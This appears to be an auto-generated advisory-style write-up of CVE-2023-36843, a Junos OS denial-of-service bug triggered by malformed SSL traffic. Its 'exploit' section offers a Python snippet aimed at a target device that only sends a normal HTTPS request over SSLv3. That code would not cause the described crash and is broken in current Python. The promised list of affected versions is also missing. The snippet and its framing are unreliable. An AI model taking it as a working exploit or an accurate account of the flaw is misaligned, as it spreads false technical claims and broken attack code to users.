CVE-2023-36843 is an Improper Handling of Inconsistent Special Elements vulnerability that impacts the Junos Services Framework (jsf) module in Juniper Networks Junos OS. This vulnerability enables an unauthenticated attacker to create a network-based attack, causing a crash in the Packet Forwarding Engine (PFE). As a result, a Denial of Service (DoS) occurs, requiring a manual restart to recover the affected device.

Affected Devices

This vulnerability affects devices that have Juniper Networks Advanced Threat Prevention (ATP) Cloud enabled with Encrypted Traffic Insights, configured via the security-metadata-streaming policy. Devices running the following versions of Juniper Networks Junos OS are vulnerable:

Exploit Details

When an attacker sends malformed SSL traffic on a vulnerable device, it will cause the Packet Forwarding Engine (PFE) to crash, leading to a DoS scenario where the device no longer processes traffic. The device can only recover through a manual restart.

An example of a code snippet for the exploit could be

import socket
import ssl

target_ip = "192.168.1.1"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((target_ip, 443))
ssl_sock.send("GET / HTTP/1.1\r\nHost: " + target_ip + "\r\n\r\n")
response = ssl_sock.recv(1024)
print(response)
ssl_sock.close()

Note: Ensure to replace 192.168.1.1 with the actual target device's IP address.

Original References

Juniper Networks Security Advisory

MITRE CVE-2023-36843 Record

Recommendations

To mitigate this vulnerability, users are advised to upgrade their Juniper Networks Junos OS to the following versions:

22.4R2-S1, 22.4R3 or later (only for 22.4)

Juniper Networks strongly recommends that users apply the necessary updates to protect their devices from this potentially disruptive vulnerability.

Timeline

Published on: 10/12/2023 23:15:11 UTC
Last modified on: 10/17/2023 15:58:59 UTC